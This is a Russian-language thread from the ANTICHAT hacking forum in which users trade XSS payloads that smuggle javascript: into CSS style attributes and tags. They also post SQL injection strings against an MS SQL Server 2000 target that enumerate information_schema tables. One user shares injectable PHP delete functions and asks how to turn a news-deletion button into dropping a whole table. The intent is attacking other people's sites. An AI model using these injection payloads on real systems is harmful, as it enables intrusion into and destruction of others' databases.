ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Блииин,ну вот сделай html докуменд с содержанием <span style="color:#00FF00;background-image:url(javascript:alert());">ttt</span> и открой,ничего же не пашет!!!

кажись уже давали эту ссылку:
http://www.inattack.ru/article/519.html
там насчет style 2 вектора есть, попробуй)

Как я и думал,точнейшие примеры из етого сайта по етому,вот

2. <DIV>. Данный тег служит контейнером для внутреннего текста. К тексту, который находится внутри тегов <div></div>, может быть применён определённый стиль (CSS). Вот пример использования данного тега для XSS атаки:
<DIV STYLE="background-image: url(javascript:alert('Я здесь был'))">

Как видите, здесь мы используем вставку кода в параметр STYLE. Но есть и ещё один вариант использования данного тега. Не с помощью функции url(), а через функцию expression():
<DIV STYLE="width: expression(alert('Я здесь был '));">
В данном случае тоже используется параметр STYLE.

3. <STYLE>. Данный тег задает правила оформления и форматирования элементов, находящихся внутри тегов <STYLE></STYLE>. Вот 2 варианта использования XSS:
<STYLE>.XSS{background-image:url("javascript:alert('Я здесь был ')");}</STYLE><A CLASS=XSS></A>

Здесь происходит следующее действие – сначала объявляется класс XSS(в нём расположен XSS- код), а затем он вызывается с помощью
<A CLASS=XSS></A>

Второй вариант:
<STYLE> type="text/css">BODY{background:url("javascript:alert(‘Я здесь был’)")} </STYLE>
В этом варианте наш XSS-код указывается как фоновое изображение странички.



И НЕОДИН ИЗ НИХ НЕ ПАШЕТ!(((

Там опечатка была )) Ну а в целом я так и сделал. И опять такую же ошибку выдает...

Еще одная интересная фишка:
Если выполнить -1+or+1=(select+user)-- то норм проходит.
А если попробовать :
-1+or+1=(SELECT+top+1+table_name+from+information_s chema.tables)--
Выдает:
Incorrect syntax near the keyword 'top'.

Если так:
-1+or+1=(SELECT+table_name+from+information_schema. tables)--
Incorrect syntax near the keyword 'FROM'.

Странно.

З. Ы. Microsoft SQL Server 2000

помогите немогу подобрать значение!

Тут нет инъекции..

а что это по твоему?

Обращаюсь к код-хакам:

function del_news($news_id)
{
if ($news_id)
{
//echo("del_news<br>");
$r = mysql_query("SELECT news_icon FROM news WHERE news_id=".$news_id);
$arr = mysql_fetch_array($r);

if ($arr[0]){ del_img($news_id);}
//echo("del_news_id=".$news_id."<br>");
mysql_query("DELETE FROM news WHERE news_id=".$news_id);
}
else echo("Функция del_news(news_id) - не указан news_id.<br>");
}

function del_img($news_id)
{
if ($news_id)
{
//echo("del_img<br>");
$r = mysql_query("SELECT news_icon FROM news WHERE news_id=".$news_id);
$arr = mysql_fetch_array($r);
mysql_query("UPDATE news SET news_icon=NULL WHERE news_id=".$news_id);
unlink("../".img_path.$arr[0]);
}
else echo("Функция del_img(news_id) - не указан news_id.<br>");
}

Если поставить DEL запрос - он прокатит ? Если допустить,что $news_id принимает всё,что угодно. Есть в прайс листе такая кнопка Удалить),и вместо удаления новости я хочу удалить таблицу)).Покатит ? Как это будет выглядеть,я тоже не совсем понимаю =_=

Просто раскрытие путей.

Советую почитать FAQ , там написанно, как инъекцию определить..